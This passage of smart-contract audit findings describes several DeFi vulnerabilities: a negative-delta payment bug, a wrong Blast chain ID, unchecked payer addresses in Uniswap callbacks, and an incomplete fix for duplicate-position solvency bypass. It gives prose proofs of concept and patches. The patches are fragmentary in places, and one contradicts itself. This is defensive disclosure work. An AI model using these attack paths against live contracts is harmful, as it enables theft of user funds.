  3. The current implementation incorrectly sets amountToPay to uint256(amount1Delta), which is equivalent to uint256(-50). Due to the unsigned integer conversion, amountToPay becomes a large positive value.
  4. The function proceeds to transfer this large amount of tokens from the payer to the pool, even though no tokens should be transferred.

This how the incorrect determination of amountToPay can lead to unintended token transfers and potential loss of funds for the payer.

Tools Used

Vs Code

Recommended Mitigation Steps

Modify the logic to handle the case when both deltas are negative.

// Transform the amount to pay to uint256 (take positive one from amount0 and amount1)
uint256 amountToPay;
if (amount0Delta > 0) {
    amountToPay = uint256(amount0Delta);
} else if (amount1Delta > 0) {
    amountToPay = uint256(amount1Delta);
} else {
    // Both deltas are negative, no need to pay

// Pay the required token from the payer to the caller of this contract
SafeTransferLib.safeTransferFrom(token, decoded.payer, msg.sender, amountToPay);

Assessed type


getChainName()'s implementation is somewhat broken on the Blast chain.

Lines of code

Vulnerability details

Proof of Concept

Take a look at

    function getChainName() internal view returns (string memory) {
        if (block.chainid == 1) {
            return "Ethereum Mainnet";
        } else if (block.chainid == 56) {
            return "BNB Smart Chain Mainnet";
        } else if (block.chainid == 42161) {
            return "Arbitrum One";
        } else if (block.chainid == 8453) {
            return "Base";
        } else if (block.chainid == 43114) {
            return "Avalanche C-Chain";
        } else if (block.chainid == 137) {
            return "Polygon Mainnet";
        } else if (block.chainid == 10) {
            return "OP Mainnet";
        } else if (block.chainid == 42220) {
            return "Celo Mainnet";
        } else if (block.chainid == 238) {//@audit
            return "Blast Mainnet";
        } else {
            return LibString.toString(block.chainid);

Evidently attempt of getting the chain name checks the current block chainId and then attaches it, it's name.

Now note that this function is used in multiple instances in protocol, from generating the SVG of the NFTs and what not, as confirmed by this search command:

Problem however, is that this implementation doesn't work as expected on the blast chain due to the protocol using a wrong chain ID for blast mainnet.

Going to the official Blast docs:

We can see that that the correct chainId for the blast mainnet should be 81457, see the below:

The above would mean that generating SVG info would not work as expected on the Blast mainnet unlike other chains.


Generating SVGs would be broken for the Blast mainnet.

Recommended Mitigation Steps

Consider applying these changes to

    function getChainName() internal view returns (string memory) {
        if (block.chainid == 1) {
            return "Ethereum Mainnet";
        } else if (block.chainid == 56) {
            return "BNB Smart Chain Mainnet";
        } else if (block.chainid == 42161) {
            return "Arbitrum One";
        } else if (block.chainid == 8453) {
            return "Base";
        } else if (block.chainid == 43114) {
            return "Avalanche C-Chain";
        } else if (block.chainid == 137) {
            return "Polygon Mainnet";
        } else if (block.chainid == 10) {
            return "OP Mainnet";
        } else if (block.chainid == 42220) {
            return "Celo Mainnet";
-        } else if (block.chainid == 238) {
+        } else if (block.chainid == 81457) {
            return "Blast Mainnet";
        } else {
            return LibString.toString(block.chainid);

Assessed type


Arbitrary from Address in transferFrom Function in the SemiFungiblePositionManager contract

Lines of code

Vulnerability details


Detailed description of the impact of this finding.




Arbitrary from Address in transferFrom Function

The use of an arbitrary from address in the transferFrom calls within the uniswapV3MintCallback and uniswapV3SwapCallback functions could lead to unauthorised token transfers. This vulnerability may allow an attacker to transfer tokens from any address that has approved the contract, potentially resulting in the loss of funds without the token holder’s consent.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

  1. Deploy the SemiFungiblePositionManager contract.
  2. Invoke the uniswapV3MintCallback or uniswapV3SwapCallback with a malicious payer address that has not authorised the contract to transfer tokens on its behalf.
  3. Observe if the contract is able to transfer tokens from this unauthorised address.

Expected Result:
The transaction should pass due to lack of authorisation.

Tools Used

Manual review and Slither.

Recommended Mitigation Steps

Validate from Address:
Implement checks to ensure that the from address in the transferFrom calls is a trusted and verified address, not arbitrarily supplied by the user.

Access Controls:
Introduce role-based access control (RBAC) to restrict who can call sensitive functions like uniswapV3MintCallback and uniswapV3SwapCallback. Use modifiers.

Assessed type

Access Control

Issue M-02 not correctly fixed since the check is not inclusive

Lines of code

Vulnerability details

Proof of Concept

See M-02 here

TLDR of the report is that the _validatePositionList() function fails to detect duplicate token IDs. And this oversight allows attackers to bypass solvency checks, enabling insolvent users to perform actions like minting, burning, liquidating, and force exercising options, as well as settling long premiums on behalf of other insolvent users.

Now, the bug stems from the function's inability to differentiate between unique and duplicated token IDs, which can be exploited by adding multiple instances of the same token ID to generate a duplicate position hash. This manipulation can inflate an account's collateral balance beyond its required level, falsely indicating solvency.

So to mitigate this vulnerability, wardens recommended to introduce a check in _validatePositionList() to ensure the token ID array length is shorter than MAX_POSITIONS (32)., however going to the implemented fix, this has not been accurately done, as the check is inclusive and actually erroneously accepts the data passed in even if the array length is not shorter than MAX_POSITIONS, see

    function _updatePositionsHash(address account, TokenId tokenId, bool addFlag) internal {
        // Get the current position hash value (fingerprint of all pre-existing positions created by '_account')
        // Add the current tokenId to the positionsHash as XOR'd
        // since 0 ^ x = x, no problem on first mint
        // Store values back into the user option details with the updated hash (leaves the other parameters unchanged)
        uint256 newHash = PanopticMath.updatePositionsHash(
        if ((newHash >> 248) > MAX_POSITIONS) revert Errors.TooManyPositionsOpen();
        s_positionsHash[account] = newHash;

Which would mean that when (newHash >> 248) == MAX_POSITIONS the execution does not revert where as it should.


M-02 has not been accurately fixed, leaving protocol susceptible to all the attacks mentioned in the original submission.

Recommended Mitigation Steps

Consider applying the fix as was in the original submission, i.e :

-        if ((newHash >> 248) > MAX_POSITIONS) revert Errors.TooManyPositionsOpen();
+        if ((newHash >> 248) >= MAX_POSITIONS) revert Errors.TooManyPositionsOpen();
        s_positionsHash[account] = newHash;

Assessed type


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